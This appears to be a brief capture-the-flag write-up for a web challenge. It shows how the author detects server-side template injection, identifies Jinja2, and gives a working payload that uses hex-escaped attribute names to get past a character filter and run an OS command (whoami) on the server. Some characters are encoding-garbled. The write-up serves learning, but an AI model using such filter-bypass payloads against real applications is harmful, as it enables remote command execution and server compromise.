I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
This is going to be challenging, but weβve got this because, based on the descriptionβ¦
Using this image, we can test the site to see which templates we are working on.
from ${7 * 7} didnβt work, {{7 * 7}} works -> {{7*β7'}} works β> jinja2 or twig
Based on this post, we have different payloads to be able to bypass this with Jinja2Β https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/
Terminal
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('whoami')|attr('read')()}}
